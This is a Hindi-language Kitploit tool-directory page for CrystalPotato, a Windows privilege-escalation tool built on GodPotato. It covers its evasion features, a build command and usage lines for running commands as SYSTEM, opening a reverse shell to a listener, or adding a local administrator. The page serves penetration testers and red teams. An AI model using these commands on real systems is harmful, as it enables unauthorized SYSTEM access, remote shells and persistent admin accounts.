Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CrystalPotato — GodPotato का Crystal पोर्ट, जो अप्रत्यक्ष सिसकॉल, डायनेमिक API रिज़ॉल्यूशन और कंपाइल-टाइम स्ट्रिंग ऑब्फस्केशन के साथ SeImpersonatePrivilege का दुरुपयोग करता है। कमांड चलाएँ, रिवर्स शेल प्राप्त करें या उपयोगकर्ता जोड़ें। | Kitploit
उपकरण/GitHubGitHub/ricardojoserf/crystalpotato
विशेषाधिकार वृद्धिशोषणपोस्ट-शोषणपेनिट्रेशन टेस्टिंगरेड टीमिंगप्रतिकूल हमला
GitHubricardojoserf/crystalpotato

CrystalPotato

GodPotato का Crystal पोर्ट, जो अप्रत्यक्ष सिसकॉल, डायनेमिक API रिज़ॉल्यूशन और कंपाइल-टाइम स्ट्रिंग ऑब्फस्केशन के साथ SeImpersonatePrivilege का दुरुपयोग करता है। कमांड चलाएँ, रिवर्स शेल प्राप्त करें या उपयोगकर्ता जोड़ें।

रिपॉजिटरी देखें
81 दिन पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें
वेबसाइट

CrystalPotato

CrystalPotato, GodPotato का Crystal पोर्ट है, जो SeImpersonatePrivilege वाले खातों से SYSTEM तक स्थानीय विशेषाधिकार वृद्धि (local privilege escalation) है। यह DCOM OXID Resolver और named pipe impersonation का दुरुपयोग करके काम करता है।

Windows APIs को डायनामिक रूप से रिज़ॉल्व किया जाता है और indirect syscall stubs के माध्यम से इन्वोक किया जाता है, सभी स्ट्रिंग्स कंपाइल समय पर XOR-obfuscated होती हैं और डिफ़ॉल्ट रूप से केवल कमांड आउटपुट प्रिंट होता है। Windows 10, 11 और Server 2025 पर परीक्षण किया गया है।

CrystalPotato

बिल्ड

CrystalPotato, Crystal on Windows का उपयोग करके बिना किसी निर्भरता के एक ही फ़ाइल में कंपाइल होता है:

root@kitploit:~
crystal build CrystalPotato.cr -o CrystalPotato.exe --release --static

उपयोग

एक कमांड निष्पादित करें, reverse shell शुरू करें, या एक स्थानीय एडमिन बनाएँ।

root@kitploit:~
CrystalPotato.exe -c <COMMAND>
CrystalPotato.exe -H <LHOST> -P <LPORT> [-c <SHELL>]
CrystalPotato.exe -u <USER> -pw <PASS>

img2

स्रोत

  • GodPotato - BeichenDream द्वारा मूल C# इम्प्लीमेंटेशन।

  • RustPotato - safedv द्वारा Rust इम्प्लीमेंटेशन।

  • SigmaPotato - tylerdotrar द्वारा अतिरिक्त कार्यक्षमताओं के साथ C# इम्प्लीमेंटेशन।

टूल डाउनलोड करें
Flagविवरण
-c CMDSYSTEM के रूप में निष्पादित करने के लिए कमांड या reverse shell के लिए शेल (डिफ़ॉल्ट: cmd.exe)
-H HOSTReverse shell लिसनर Host
-P PORTReverse shell लिसनर Port
-u USERस्थानीय एडमिन बनाएँ - उपयोगकर्ता नाम
-pw PASSस्थानीय एडमिन बनाएँ - पासवर्ड
-p NAMEकस्टम pipe नाम (डिफ़ॉल्ट: Crystal)
-dडीबग आउटपुट
-ddपूर्ण ट्रेस
-hसहायता दिखाएँ